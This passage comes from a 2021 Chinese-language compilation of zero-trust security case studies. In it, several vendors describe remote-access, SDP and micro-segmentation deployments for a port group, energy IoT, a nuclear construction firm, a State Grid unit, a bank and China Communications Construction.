2.采用同一个轻量级 agent 以及云+端的架构,不占用工作负载资源的同时
能够覆盖公有云、私有云、混合云模式下的服务器工作负载。
3.可控范围足够广泛,能够对应急事件做出合理的、迅速的处理。
4.多维度的隔离能力,全面降低东西向的横向穿透风险。
5.具备策略自适应能力,能根据虚拟机的迁移、拓展实现安全策略自动迁移。
6.自适应的防护能力,实现对实时变化的网络环境,实时更新策略。
7.把策略从每一个分散的控制点上给拿出来,放在一个统一集中的地方进行
设计,实现集中管理和维护。
6.4 经验总结
基于深度剖析客户的安全体系,对其体系中的“隐患”要抓准,抓全面,要
“对症下药”。零信任方案落地不单单靠使用安全设备做网络隔离,持续性的安
全监测、可视化的业务访问态势、动态的策略调整等安全运营能力也需要加强。
只有兼顾提升安全防护能力和安全运营能力,才能在设备防护层面以及安全意识
层做到面全的提升,进而完善整个安全体系。
©2021 云安全联盟大中华区-版权所有
40
7、深信服山东港口集团零信任多数据中心
安全接入
7.1 方案背景
山东港口集团拥有青岛港集团、日照港集团、烟台港集团、渤海湾港口集团
四大港口集团,经营金控、港湾建设、产城融合、物流、航运、邮轮文旅、装备
制造、贸易、科技、海外发展、职教等十一个业务板块,在日常业务开展过程中,
遇到一些安全挑战:
1.业务系统分布在不同的数据中心,员工需要同时移动接入多个数据中心访
问业务系统;
2.一些业务系统直接暴露在互联网上,且明文传输,需要收缩业务系统暴露
面,实现数据安全传输;
3.不同港口、业务板块的人员难以区分用户权限;
4.有大量的 H5 应用需要通过移动终端、PC 访问,缺乏统一的门户入口。
山东港口集团希望找到一套合适的方案来解决上述问题。
7.2 方案概述和应用场景
通过市场调研和交流,山东港口集团认为深信服零信任远程接入方案非常符
合他们的需求。
1.在集团总部部署了深信服零信任控制中心,在各数据中心分阶段部署深信
服零信任安全代理网关,实现多数据中心的同时接入;
2.通过策略配置,将业务系统收缩进内网,避免直接暴露在互联网,并通过
SSL 加密技术实现数据传输加密;
3.引入办公门户 APP,实现 H5 应用的统一入口,并新建统一认证平台,实
现所有员工的统一身份管理、业务系统统一认证,以及单点登录;
4.通过策略配置,将零信任与办公门户 APP、统一认证平台的对接,实现办
©2021 云安全联盟大中华区-版权所有
41
公门户 APP 的安全接入和单点登录;
5.通过权限策略配置,实现动态权限管理。
7.3 优势特点和应用价值
山东港口集团通过零信任方案建设实现了安全移动办公,员工可以随时随地
安全地访问各数据中心的业务系统,提高的经营生产效率;
通过 SDP 的分布式部署方案,实现多数据中心业务系统的同时访问和灵活扩
容,解决了传统的 VPN 的方案无法实现多数据中心业务系统同时访问;
通过办公门户 APP、统一认证平台建设,并与零信任结合,实现了门户入口
集约化和统一身份管理,提高办公效率与安全性。
7.4 经验总结
项目实施过程面临的挑战一是涉及众多业务系统对接,复杂度较高,比如零
信任设备要与办公门户 APP 以及统一认证平台对接,需要厂商具备丰富的对接案
例和经验;二是人员角色众多,人员访问业务系统的权限梳理难度较大;三是数
据中心分布在不同的城市,设备的安装部署需要有丰富的经验。
8、杭州漠坦尼-物联网零信任安全解决方案
8.1 方案背景
近年来,能源行业全力推进“互联网+智慧能源”战略贯彻,引入“大云物
移智链 5G”等新技术,新技术的应用使网络内部的设备不断增长,尤其新型业
务发展接入了海量的物联网,使网络“边界”越来越模糊,已经突破了传统能源
网络安全防护模型。这些新兴业务的出现所带来的新问题,让安全防护要求变得
更为错综复杂。
©2021 云安全联盟大中华区-版权所有
42
8.2 方案概述和应用场景
平台设计采用以端到端安全防护为核心的零信任安全理念,建立以身份为中
心,基于持续信任评估和授权的动态访问控制体系,同时结合现有安全防护措施
实现网络安全防护架构演变,形成持续自适应风险与信任评估网络安全防护体系。
图 1
1.动态授权服务系统
提供权限管理服务,同时对授权的动态策略进行配置,包括动态角色、权限风
险策略等。
2.智能身份分析系统
针对人员认证提供动态口令、人脸识别、指纹识别等身份鉴别技术;针对终
端设备提供基于设备属性的‘身份’认证。
3.访问控制平台
能够接收终端环境感知系统推送的风险通报,能够接收智能身份分析系统与
动态授权服务系统提供的身份与权限信息,反馈执行相应的权限控制策略。能够
为网关分配密钥,下发通信加密证书。
4.终端环境感知系统
具备智能终端环境实时监测能力,从各类环境属性分析安全风险,确定影响
©2021 云安全联盟大中华区-版权所有
43
因素提高对终端信任度量准确度,为信任度评估提供支撑。
5.终端 TEE(安全可信执行环境)
提供终端侧的行为监测、安全认证、内生安全防护等功能,为终端构建安全
隔离执行环境。
目前,平台覆盖了能源行业用户的典型应用场景,如远程办公、外部协作、
物理网防护场景等,同时相关关键技术与产品也可逐步拓展应用到石化、铁路、
水利、轨道交通等多个工业控制领域,具备在全国其他关键信息技术设施进行大
规模推广的前景。
8.3 优势特点和应用价值:
漠坦尼物联网零信任安全防护平台可以帮助能源行业用户面对大规模复杂
物联网环境时保障业务与数据的安全通过对零信任安全防护体系建设,以动态信
任评估体系为核心将安全技术和安全设备融为统一技防体系,降低安全风险概率,
增强终端防护能力,打破空间和时间的限制,以身份为中心为业务与数据提供全
方位持续防护,在保证安全性的同时为业务创新提供强有力的网络架构支撑,更
有效的挖掘数据价值,释放数据潜能。
8.4 经验总结
在项目实施过程中遇到过物联终端设备、哑终端设备管控等一系列挑战与问
题,下一步项目将继续进一步完善,丰富可接入纳管的终端类型,优化安全感知
与响应能力,在更多的业务场景中提供可靠的安全防护。
©2021 云安全联盟大中华区-版权所有
44
9、易安联中国核工业华兴建设有限公司
EnSDP 零信任安界防护平台
9.1 方案背景
中核华兴承担过众多核工程、国防军工工程的建设,参加了国内及出口的大
部分核电站的工程建设。业务系统具有较高的安全等级要求,为响应相关部门及
集团的安全管理要求,参加“HW 行动”,检验自身在应对安全威胁的应对能力、
防控能力。
在了解到 EnSDP 零信任安界访问方案后,中核华兴采用 EnSDP 来保障业务系
统安全,有效防止攻方针对业务系统发起的渗透攻击等安全威胁。
9.1.1 网络现状和安全需求
1.业务系统暴露在互联网,成为黑客攻击、入侵的入口之一;
2.人员类型复杂,需要同时满足本地用户、下属企业及移动办公用户的远程
安全接入;
3.老旧的业务系统自身组件如中间件、数据库等存在漏洞,无法妥善处理,
被网安部门通报。
4.员工终端设备没有进行全面管理,终端设备随意接入公司网络,缺乏终端
防护手段,导致增加网络暴露面。
5.缺少对业务系统的保护措施,以勒索病毒为例,黑客一旦边界进入到内网,
会进行渗透扫描,寻找有价值的业务服务器,对服务器进行定向攻击。
©2021 云安全联盟大中华区-版权所有
45
9.2 方案概述和应用场景
9.2.1 方案
图 1
易安联结合自身产品,根据对企业的调研,以及中核华兴的安全需求情况,
提供了易安联 EnSDP 零信任安界访问解决方案。
9.2.2 应用场景
1.远程办公
可完美替换 VPN,解决 VPN 漏洞多、管理繁、回溯难的问题;可支持普通浏
览器和钉钉/微信小程序接入,提供便捷安全的远程接入方式。
2.护网行动
基于应用网关的应用隐藏机制,可百分百保障护网行动,应用网关隐藏业务
和自身,红队扫描不到,无从发起攻击,解决客户应对护网的问题。
3.数据泄露防护
可对端侧工作域内的数据隔离/加密,解决端侧数据泄露的问题。
©2021 云安全联盟大中华区-版权所有
46
4.内部审查
可对用户行为和应用访问深度分析,通过网状关联,即时发现异常给出告警
和策略联动,解决客户内部数据泄露的问题;可有效管控运维人员,解决运维人
员的权限难控制和数据易泄漏的问题。
5.业务上云
支持公有云、私有云及混合云,有效保障云上应用的东西向安全,助力客户
业务安全上云。
9.3 优势特点和应用价值
9.3.1 优势特点
本方案充分考虑了系统的可用性、可靠性、及可扩容性。具体的方案优势如
下:
1、暴露面收敛
EnSDP 默认屏蔽任何非授权的访问请求,不响应任何 TCP、UDP 等形式的报
文,只响应通过可信设备且使用 EnAgent 客户端登录的请求,所以对于任何人来
讲不能利用端口扫描、漏洞扫描等工具进行渗透攻击。
2、阻断直接访问形式的安全威胁
非可信账号、非可信设备无法得到业务系统的直接响应,导致攻击方无法尝
试利用 WEB 系统 SQL 注入、XSS 攻击等方式造成攻击。
3、核心业务系统一件断网
提供最为便利的远程管理工具,EnSDP 可实现对特定应用一键关闭,解决重
要时期或紧急情况的业务系统断网处理。
4、统一身份管理
打通业务系统之间账号信息,员工不需要记住多套账号密码,为方便维护和
管理,弱口令、弱密码等安全问题得到有效解决。
5、智能权限控制
通过 EnSDP 实现对用户鉴定及授权,单次访问仅授予最小权限,并通过用户
身份,终端类型,设备属性,接入网络,接入位置,接入时间等属性来感知用户
©2021 云安全联盟大中华区-版权所有
47
的访问上下文行为,并动态调整用户信任级别。
6、设备管理
主要确保用户每次接入网络的设备是可信的,系统会为每个用户生成
唯一的硬件识别码,并关联用户账号,确保用户每次登陆都使用的是合规、
可信的设备,对非可信的设备要进行强身份认证,用户通过后则允许新设
备入网。
7、可信环境感知
对发起访问者所使用设备(手机、电脑等)的软环境进行检测,如设
备所使用操作系统的版本、是否安装制定的杀毒软件、杀毒软件是否开启、
杀毒软件的病毒库更新到新版本等。
8、异常行为审计
从用户请求网络连接开始,到访问服务返回结果结束,使所有的操作、管理
和运行更加可视、可控、可管理、可跟踪。实现重点数据的全过程审计,识别并
记录异常数据操作行为,实时告警,保证数据使用时的透明可审计。
9、洞察访问态势
实时同步全球安全威胁情报,及时感知已知威胁,全方位多维度安全数据挖
掘,支持用户、设备、应用等维度数据采集,对用户行为、设备等信息进行全面
统计并输出多维度报表。
9.3.2 应用价值
1.提升中核华兴安全接入管控能力,所有业务系统都通过 EnSDP 进行安全防
护,实现真正意义上的唯一入口,便于管控。
2.增强中核华兴业务系统安全防护能力,提上应对攻方发起的内网扫描、嗅
探等渗透攻击方式的应对能力,有效屏蔽 XSS 攻击、SQL 注入攻击等安全威胁。
3.管理人员利用 Web 终端功能实现便捷的远程管理维护,同时可以对特定应
用一键断网,实现秒级关闭访问通道。
4.员工访问通过 EnSDP 业务统一安全访问入口,使用统一身份认证账号,无
需记住多套账号密码。
©2021 云安全联盟大中华区-版权所有
48
9.4 经验总结
我司系统版本经常迭代,用户在版本升级的同时,进行业务发布,未成功保
存,导致业务发布不成功。
10、虎符网络国家电网某二级单位基于零信
任架构的远程安全访问解决方案
10.1 方案背景
当前安全态势下,网络黑产的产业化、集团化应用趋势明显;网络成为某些
恶意组织作恶的主要工具或者武器装备,网络威胁种类也更加复杂多变,现有安
全解决方案难以应对高级、持续、集团化、武器化的威胁。主要配套的 APT 检测
防御等设备应用门槛高,落地效果一般,并不能够保证业务实时的安全性。
近些年来,随着国家对网络安全的重视程度大幅度提升,尤其是国网、中石
油、铁路等国有重大型企业,国家对其尤为重视。对此,习近平总书记也特别强
调,要加强对信息基础设施网络安全防护,加强网络安全信息统筹机制、手段、
平台建设,加强网络安全事件应急指挥能力建设,积极发展网络安全产业,做到
关口前移,防患于未然;其次,落实关键信息基础设施防护责任,行业、企业作
为关键信息基础设施运营者承担主体防护责任。因此,确保关键基础设施能够稳
定运行,构建零信任远程访问,保护敏感信息不被泄露极为重要。
国家高度重视电力等关键信息基础设施的网络安全工作。《中华人民共和国
网络安全法》将抵御境内外网络安全威胁、保护关键信息基础设施、数据安全防
护等工作上升至法律的层面,严格相关责任和处罚措施。国网公司作为国家特大
型公用事业企业,被公安部列为国家网络安全重点保卫单位。各省公司作为国网
公司的重要子公司承担着确保网络与信息安全的重要职责,如有其中某一点被攻
破,整个电网体系将面临巨大的挑战。
虎符网络专注于零信任技术架构下的防护体系建设,构建外防攻击、内护数
©2021 云安全联盟大中华区-版权所有
49
据的新安全体系实践。在国网公司已落地多个项目,其中以 2 个典型用户场景作
为 2021 年零信任落地案例申报:
1.国家电网有限公司某二级直属单位教育培训终端零信任技术应用
国家电网有限公司某二级直属单位作为国家电网领导干部培训主阵地,其自
主研发的教育培训终端将通过互联网侧对国网系统内领导干部开展培训教育工
作,其重要性由此可见一斑。所以该单位对于派发的教育培训终端的数据传输、
数据运行以及数据维护等工作保密程度也极为看重。
虎符网络针对该单位的实际业务需求以及对各地的教学培训终端的远程管
控要求做了整体的调研分析,发现以下几点实际需求:
1)该终端系统具备一套成熟的账号体系,能够清晰的定位每台设备对应的
所属物理位置及所属单位,用户侧只限于该终端系统内指定开放的应用进行远程
学习;
2)该终端系统实际访问用户较为明确,面向对象也是针对国网公司系统内
单位,主要通过互联网侧开展相应的培训工作。
2.国家电网有限公司某二级产业单位公司电力仿真实验室零信任技术应用
国家电网有限公司某二级产业单位公司为应对国际各类网络攻击事件以及
新型攻击手段进行研究,并提供国网系统内网络安全工作安全防护提升解决方案。
其下创立了电力仿真实验室,针对电力系统经常被使用的供电系统、IT 设备、
中控设备等仿真环境开展技术研究,并设定攻防演练平台供信息安全红队人员开
展场景性攻防演练工作。为提供便利的业务服务环境,该单位部分应用部署在实
验室边界防火墙后的 DMZ 区,通过大量安全防护设备进行权限管理。
运维人员意识到远程访问无法针对操作者的审计以及操作人员的身份甄别,
缺乏更安全更方便的远程访问方式,甚至应有一些对抗手段,比如攻击检测和预
警。其典型业务需要包括:
1)提供一种比较隐匿的远程访问方式,同时又不能被潜在的网络攻击者通
过互联网出口嗅探到,减少暴露面。
2)能够实时有效的接入的实验室人员终端设备做管控,通过可信的终端才
能够访问到远程访问设备,其他终端自动拒绝;同时异常访问行为能被感知并预
警,以方便甲方应急响应事件。
©2021 云安全联盟大中华区-版权所有
50
3)实验室中部署的攻防演练平台,在比赛期间需要对指定的信息安全红队
人员临时开放账户,同时需要限制这些临时账户的访问权限,只允许访问特定的
靶标系统,不能访问实验室内网中的其他应用。攻防演练比赛结束后,这些临时
账户的权限能够自动回收,减少由于忘记删除账号而导致的数据泄漏风险。
4)解决传统 VPN 无法解决的问题。例如,传统 VPN 不支持自定义路由配置。
如下图所示,甲方需要在其实验室的办公内网访问部署在公网上的培训系统,但
办公内网使用 172 网段,无法直接通过防火墙开放到外网,需要系统支持路由配
置。这种自定义路由配置,在传统 VPN 上实现难度较大。
图 1
针对上述需求和痛点,甲方采用了虎符网络的虎盾零信任远程访问系统(简
称“虎盾 ZRA”)。虎盾 ZRA 是可替代传统 VPN 设备的下一代远程安全访问系统,
在提供远程访问通道的同时提供多种安全保障。
10.2 方案概述和应用场景
针对远程访问实验室内部服务资源的全业务流程,虎盾 ZRA 提供基于设备侧
环境信息和网络侧行为信息,覆盖网络层、登录层、访问层的一体化零信任防御
体系。
©2021 云安全联盟大中华区-版权所有
51
图 2
用户访问实验室内网应用时,将会经过以下验证和授权过程:
图 3
1.用户通过互联网使用虎盾 ZRA 客户端进行 SDP 敲门;
2.虎盾 ZRA 网关验证敲门信息,验证通过则返回响应包至客户端主机,同时
允许客户端所在的外网 IP 访问 TCP 服务端口;
3.客户端提交用户/终端信息至虎盾 ZRA 网关进行验证;
4.虎盾 ZRA 网关验证用户/终端信息,验证通过后授予客户端主机相关应用
的访问权限;
5.客户端接入到虎盾 ZRA 网关,访问授权的内网应用;
©2021 云安全联盟大中华区-版权所有
52
6.虎盾 ZRA 网关将客户端的访问请求转发至应用系统;
7.应用系统响应虎盾 ZRA 网关转发的请求;
8.虎盾 ZRA 网关转发应用系统的响应内容至客户端主机。
部署完成后,所有流量均由虎盾 ZRA 代理进行访问,实验室内部应用需要与
虎盾 ZRA 进行对接,同时虎盾 ZRA 通过企业内部、云端身份体系对用户访问应用
权限按需分配。
图 4
9.采用流量代理模式对内部应用和数据访问流量进行收口,隐藏内部业务系
统,收缩资产暴露面,整个网络去除匿名流量。同时仅对公网开放一个 UDP 端口,
对于非法请求,端口保持静默,达到“隐身”的效果,让扫描器无从下手。以上
措施解决了甲方所关心的“服务隐身”问题。
10.基于访问设备指纹信息的可信设备认证,结合对认证行为、访问行为、
访问内容的审计,让访问可控、可感知。对于网络攻防演练场景,虎盾 ZRA 提供
重保模式,非可信设备无法敲开网络,有效缓解各种网络扫描探测、漏洞攻击等
风险;同时对凭证盗用、暴力破解、网络敲门暗语滥用等行为都有预警和相应的
处置策略。以上措施解决了甲方所关心的接入设备有效管控问题。
11.在对外部人员临时开放实验室的内部攻防演练平台期间,虎盾 ZRA 允许
通过 Excel 批量导入攻防演练参赛人员名单,将此批次人员加入到特定的用户组,
并将该组的权限设置为仅访问攻防演练平台。该批次人员的身份和权限生效时间
均可定制,赛后将该用户组的权限自动收回。以上措施解决了甲方所关心外部人
员临时接入内网的账号和权限控制问题。
©2021 云安全联盟大中华区-版权所有
53
12.虎盾 ZRA 支持自定义路由条目。对于部署在公网上的培训系统的访问,
通过在虎盾 ZRA 上添加路由条目以及在上一级路由器上配置路由策略,使得内网
办公用的 172 网段也能被远程访问到,就可以让办公内网用户通过虎盾 ZRA 也可
以访问培训系统。以上措施解决了甲方所关心的传统 VPN 部分功能不满足实际业
务需求的问题。
10.3 优势特点和应用价值
电力仿真实验室通过部署虎盾 ZRA,解决了远程访问内网资源业务场景下所
面临的风险隐患。对于运维人员,通过统一的安全访问策略集中管理所有内网资
源,极大的降低了网络边界重新规划的复杂性和时间成本;简化业务合并管理,
提高远程访问安全性的同时降低运维成本。虎符网络独家提出的重保模式,能够
比较好的应对网络攻防演练场景下针对蓝队设备的检测、渗透和攻击。
作为升级版的下一代 VPN 和零信任框架下更安全的远程访问解决方案,虎盾
ZRA 可在互联网上为企业架设一层以身份为边界的逻辑私有网络,实现四大安全
目标:自身服务隐身、人员身份明确、可信设备防御、动态评估授权。
与传统的 VPN 设备相比,虎盾 ZRA 具有以下优势:
对比项
传统 VPN
虎盾 ZRA
产品理念
创建 IP 传输隧道,创建
加密通道,传统 VPN 还是网络
产品
在加密传输隧道基础上,执行多
点验证和检查,保障访问用户身份的
真实性,持续监控风险,虎盾 ZRA 是
网络安全产品。
可信设备
&设备准入
基于用户凭证(用户名+
密码),无设备和环境因素
对接已有身份认证体系,必须完
成可信设备绑定,融合设备身份和行
为身份,在应用层完成统一设备准入
和管控
自身服务
暴露面
对互联网暴露服务端口,
可能成为攻击的突破点
只对外开放一个 UPD 端口,完成
SDP 敲门之前不会响应任何客户端连
接请求,服务端口在互联网上隐藏
权限控制
无法对接入用户执行统
结合访问者身份、访问设备和访
©2021 云安全联盟大中华区-版权所有
54
对比项
传统 VPN
虎盾 ZRA
一管控,权限管理和分配难度
大
问环境等多维度因素进行动态评估,
基于判定结果对用户授予最小访问权
限
行为审计
无法对用户的业务和数
据访问行为执行深度审计
不仅提供远程访问通道,还可对
通道上内容执行深度审计
用户体验
VPN 隧道通常采取长连
接,对网络质量要求高,易断
线
微隧道代理,短连接,基于网关
的流量代理转发,连接稳定,网速更
快
10.4 经验总结
从产品定位来讲,虎盾 ZRA 可以不仅局限于用于企业内部访问的VPN替代品,
而是作为一个“网络入口”工具。接入虎盾 ZRA 后,用户应可以访问到与网关建
立信任关系的任何资源,不限于公司内部资源。
从产品功能来讲,虎盾 ZRA 内部应支持创建自定义 DNS 配置,让用户连接到
网关后,可以通过自定义域名访问企业内部资源。这种方式相当于为企业创建一
个私有的“暗网”,即可以满足业务的便利性,同时由于这些自定义域名在公网
上并不存在,也最大程度的降低了网络攻击和信息泄露的风险隐患。
11、奇安信某大型商业银行零信任远程访问
解决方案
11.1 方案背景
某银行行内主要是以办公大楼内部办公为主,员工通过内网访问日常工作所
需的业务应用。为满足员工外出办公的需要,当前主要的业务流程是通常情况下,
用户申请 VPN+云桌面的权限,在审核通过后,管理员为用户开通权限范围内的
应用。在远程访问时,员工采用账号密码方式登录 SSL VPN 客户端及云桌面拨入
©2021 云安全联盟大中华区-版权所有
55
行内办公网络,访问行内办公系统。
随着该行业务发展以及数字化转型的需要,远程办公已经成了行内不可缺少
的办公手段,并日渐成为该行常态化办公模式。同时,受疫情影响,使得行内有
些业务必须对外开放远程访问。为了统筹考虑业务本身发展需求以及类似于此类
疫情事件影响,该行着手远程办公整体规划设计。保证远程访问办公应用、业务
应用、运维资源的安全性及易用性。
图 1 客户业务现状
业务痛点:
1.用户远程访问使用的设备存在安全隐患
员工使用的终端除了派发终端还包括私有终端,安全状态不同,存在远控软
件、恶意应用、病毒木马、多人围观等风险,给内网业务带来了极大的安全隐患。
2.VPN 和云桌面自身存在安全漏洞
VPN 和云桌面产品漏洞层出不穷。尤其是传统 VPN 产品,攻击者利用 VPN 漏
洞极易绕过 VPN 用户验证,直接进入 VPN 后台将 VPN 作为渗透内网的跳板,进行
肆意横向移动。
3.静态授权机制无法实时响应风险
当前的网络接入都是预授权机制,当访问应用过程中发生。发生用户登录常
用设备、访问地理位置、访问频次、访问时段、用户的异常操作、违规操作、越
权访问、非授权访问等行为时,无法及时阻断访问降低风险。
11.2 方案概述和应用场景
为应对上述安全挑战,同时满足其远程访问的要求,奇安信基于“从不信任
并始终验证”的零信任理念,为其构建“以身份为基石、业务安全访问、持续信
任评估、动态访问控制”的核心能力,从设备、用户多个方面出发,通过立体化
©2021 云安全联盟大中华区-版权所有
56
的设备可信检查、自适应的智能用户身份认证、细粒度的动态访问控制,可视化
的访问统计溯源,模型化的访问行为分析,为为该行提供按需、动态的可信访问,
最终实现访问过程中用户的安全接入及数据安全访问。同时,结合其现有安全管
控的能力,与现有的分析系统进行安全风险事件联动,进一步提供动态访问控制
能力。
图 2 零信任远程访问整体解决方案逻辑图
图 3 零信任远程访问整体解决方案部署图
解决方案由可信访问控制台(TAC)、可信应用代理(TAP)、可信环境感知系
统(TESS)等关键产品技术组件构成。该方案在访问的业务系统前部署可信应用
代理 TAP,提供链路加密、业务隐藏、访问控制能力。通过部署可信环境感知产
©2021 云安全联盟大中华区-版权所有
57
品提供终端风险感知作用,并通过可信访问控制台提供动态决策能力。
通过部署和使用奇安信零信任远程访问解决方案,该银行构建了安全、高效
和合规的远程访问模式,实现了以最小信任度进行远程接入,对应用权限的“最
小授权”,数据的安全传输,达到了远程访问的动态访问目的。
11.3 优势特点和应用价值
奇安信零信任远程访问解决方案适用于业务远程访问、远程运维、开放众测
等多种业务场景,对应用、功能、接口各个层面形成纵深的动态访问控制机制,
既适用于传统办公访问场景,在云计算、大数据中心、物联网等新 IT 场景也具
备普适性。
11.3.1 用户价值
1.业务隐藏、收缩暴露面
可信应用代理 TAP 将云平台中数千个桌面云彻底“隐身”,不对外暴露桌面
云的 IP、端口。同时,TAP 采用 SPA 单包授权技术,默认情况下全端口全隐身(连
不上、ping 不通),只对合法用户合规终端开放网络端口。
2.终端检查、确保终端环境安全
通过可信环境感知系统 TESS 对用户访问终端进行全方面安全扫描(设备信
息、病毒扫描、漏洞扫描、补丁检测、运行软件)和持续监测,不满足检测要求
的终端将被禁止登录。
3.持续验证、提升身份可信
通过自适应多因子认证能力,根据人员、终端、环境、接入网络等因素动态
调整认证策略,兼顾安全与易用,访问过程中,根据风险情况,持续验证用户身
份是否可信。
4.按需授权、细粒度访问控制
遵循最小权限原则,基于场景化应用对业务人员进行细粒度的访问控制。基
于角色、访问上下文、访问者的信任等级、实时风险事件动态调整访问权限。
5.安全加固,防止设备被打穿,自身安全
内置 WAF 模块,有效缓解漏洞注入、溢出攻击等威胁;内置 RASP 组件,可
©2021 云安全联盟大中华区-版权所有
58
抵御基于传统签名方式无法有效保护的未知攻击,同时具备基于自学习的进程白
名单和驱动级文件防纂改能力。
6.无缝体验
解决方案使得员工拥有内外网一致的办公体验,无需用户重复登录,不会因
为网络的连通性而影响办公效率。
11.3.2 方案优势
1.访问控制基于身份而非网络位置
解决方案以身份为逻辑边界,基于身份而非网络位置构建访问控制体系,为
网络中的人、设备、应用都赋予逻辑身份,将身份化的人和设备进行运行时组合
构建访问主体,并为访问主体设定其所需的最小权限。基于身份进行细粒度的权
限设置和判定,能够更好地适应多类终端接入、多方人员接入、混合计算环境下
的数据安全访问及共享问题。
2.业务访问基于应用层代理而非网络层隧道
解决方案在应用层对所有访问请求进行认证、授权和加密传输,将业务暴露
面极度收缩,避免网络层隧道导致的暴露面过大和权限过度开放。传统业务代理
实现时由于业务暴露面过大,经常发生安全事故。
3.信任基于持续评估而非人为预置
解决方案对终端、用户等访问主体进行持续风险感知和信任评估,根据信任
评估对访问权限进行动态调整。受控终端具备安全状态可信环境感知能力,能够
根据终端上的各种安全状态信息,如漏洞修复情况、病毒木马情况、危险项情况、
安全配置以及终端各种软硬件信息,采用“可信加权”原则,将所有风险项产生
的权值进行相加,以百分制提供给可信访问控制台。
4.访问权限基于动态调整而非静态赋予
静态权限难以对风险进行实时响应和处理,解决方案基于持续信任评估和风
险感知对权限进行动态调整,遵循基于持续信任评估的动态最小权限原则,实时
对风险进行闭环处置。
©2021 云安全联盟大中华区-版权所有
59
11.4 经验总结
在方案推进过程中,奇安信安全专家发现,其实产业界多数用户均已经在关
注并认同零信任的核心理念,但在实际落地迁移中,确实也会存在一些顾虑。比
如,目前政策导向不足,零信任建设能否得到公司领导层的有力支持;需要真正
实现安全与业务的融合,对运维要求高,需具备一定的技术能力,又要熟悉自己
的业务;认为零信任建设存在建设周期长、开发成本高的问题等等。
其实,企业何时、如何进行零信任工程规划和推进并无放之四海而皆准的标
准。用户可根据自身的特点以及业务场景的需要,与方案供应商进行深入沟通和
交流,共同设计满足自身安全需求的零信任解决方案,并根据方案选择相关产品
或组件。引入零信任安全的最佳时机是和企业数字化转型保持相同的步伐,对于
不更新基础设施的企业,遵循零信任安全基本理念,结合现状,逐步规划实施零
信任;无论全新建设或者迁移,都需要基于零信任进行整体安全架构设计和规划;
同时建议,至少由 CIO/CSO 或 CISO 级别的人员在公司高层决策者的支持下推动
零信任项目,成立专门的组织(或虚拟组织)并指派具有足够权限的人作为负责
人进行零信任迁移工作的整体推进,并取得所有参与人的理解和支持,尽量减少
对员工工作的影响。此外,对于运维能力有一定的要求,需要运维人员掌握零信
任的基本概念和产品组件,方案供应商也需要积极主动配合,才产生更好的安全
效益。
12、蔷薇灵动中国交通建设股份有限公司零
信任落地解决方案
12.1 方案背景
目前中国交通建设股份有限公司(以下简称中交建)数据中心内部千台主机
所采用的网络安全防护手段主要有边界类以及终端类等产品,现有的安全防护产
品无法实现数据中心、公有云等上千规模的虚机访问关系可视化、不同介质环境
©2021 云安全联盟大中华区-版权所有
60
的统一精细化管理、点对点白名单式的访问控制,访问控制策略的管理现状主要
采用人工梳理的方式梳理数据中心内部各主机相关联的业务主机,人工梳理各主
机所需开放的业务端口,采用人工方式设置每台主机的访问控制策略,当主机业
务发生变化或主机迁移时,需人工更新访问控制策略。这种人工管理访问控制策
略的管理方式耗时长且策略梳理困难,亟需实现基于业务的访问控制关系和端口
的自动化梳理、实现基于业务的访问控制策略的设置、实现策略的自适应更新及
实现不同介质环境的统一管理。
12.2 方案概述和应用场景
12.2.1 现状描述
1.第一阶段
我司在中交建完成了对 vpc 间防火墙的部分替换,利用微隔离策略替代原有
vpc 间的防火墙策略的替换。
2.第二阶段
对中交下属 50 余家二级单位进行纳管,做到分级授权、分散管理,分数部
署方式,避免边界防火墙压力过大;
3.第三阶段
完成对 4A 身份系统的对接;
完成与 CMDB 的对接,进行配置、策略的同步更新;
12.2.2 蔷薇灵动 5 步实现数据中心零信任
1.明确要实施微隔离的基础设施,确定管理范围
中交建部署我司集群版管理中心,最大管理范围可达 25000+的终端。对纳
管范围内的虚拟机进行客户端部署,同时通过独特的身份标签技术对每一台机器
进行描述。
2.利用可视化技术对业务流进行梳理
©2021 云安全联盟大中华区-版权所有
61
图 1
3.根据业务特征,构建零信任网络架构
图 2
4.生成并配置微隔离策略,对被防护系统实施最小权限访问控制
©2021 云安全联盟大中华区-版权所有
62
图 3
5.对主机网络行为进行持续监控
图 4
12.3 优势特点和应用价值
12.3.1 优势特点
12.3.1.1 分级授权、分散管理
大型企业规模庞大、分层过多造成管理及运维困难,各部门协同工作效率不
©2021 云安全联盟大中华区-版权所有
63
高,很难及时作出有效决策。
能力体现:蔷薇灵动蜂巢自适应微隔离安全平台能对不同权限用户提供细致
到功能点的权限设置,区分安全、运维与业务部门的权限划分,结合微隔离 5
步法更好地实现数据中心零信任。
12.3.1.2 高可靠、可扩展集群
微隔离产品属于计算密集型产品,随着点数的增多计算量成指数型增长,在
应对超大规模场景时如何保持产品的稳定性、抗故障率等是一种巨大挑战。
能力体现:蔷薇灵动蜂巢自适应微隔离安全平台支持集群模式,支持更多的
工作负载接入,降低系统的耦合性,更以扩展,解决资源抢占问题,提升可靠性,
有更好的抗故障能力。
12.3.1.3 大规模一步通信引擎
随着超大规模场景的需求日益增多,管理中心和客户端之间通信能力迎来巨
大挑战。
能力体现:蔷薇灵动蜂巢自适应微隔离安全平台可做到高效并发通信,通过
软件定义的方式,从各自为战彼此协商走向了统一决策的新高度。
12.3.1.4 API 联动、高度可编排
超大规模情况下,资产信息、网络信息、安全信息、管理信息、运维信息等
各自独立,不能紧密结合。
能力体现:蔷薇灵动蜂巢自适应微隔离安全平台面向云原生,API 全面可编
排,便于融入客户自动化治理的体系结构里,讲个信息平面打通并精密编排在一
起,促进生态的建设。
12.3.1.5 高性能可视化引擎
随着云计算时代的来临,网络流量不可见就不能对业务进行精细化管控,同
时也不能进行更高层的网络策略建设。
©2021 云安全联盟大中华区-版权所有
64
能力体现:蔷薇灵动蜂巢自适应微隔离安全平台对全网流量进行可视化展示,
提供发现攻击或不合规访问的新手段,为梳理业务提供新的视角;同时平台可与
运维管理产品对接,便于对业务进行管理。
12.3.1.6 高性能自适应策略计算引擎
随着业务不断增长,企业网络架构不断演进、内部工作负载数量也呈指数型
增长。超大规模场景下,海量节点、策略量大增、策略灵活性不足等问题日益显
著, 而企业往往缺少有效的应对方式。
能力体现:蔷薇灵动蜂巢自适应微隔离安全平台可以自动适应云环境的改变。
面向业务逻辑与物理实现无关,减少策略冗余。为弹性增长的计算资源提供安全
能力。软件定义安全,支持 DevSecOps,安全与策略等同。
12.3.2 应用价值
12.3.2.1 业务价值
1.满足数据中心中各业务对东西向流量管控的要求。
针对现有业务场景,根据业务实际的访问情况,配置点对点白名单式安全策
略;需对内网服务器(虚拟机)细分安全域。对于高危端口、异常来源 IP、异
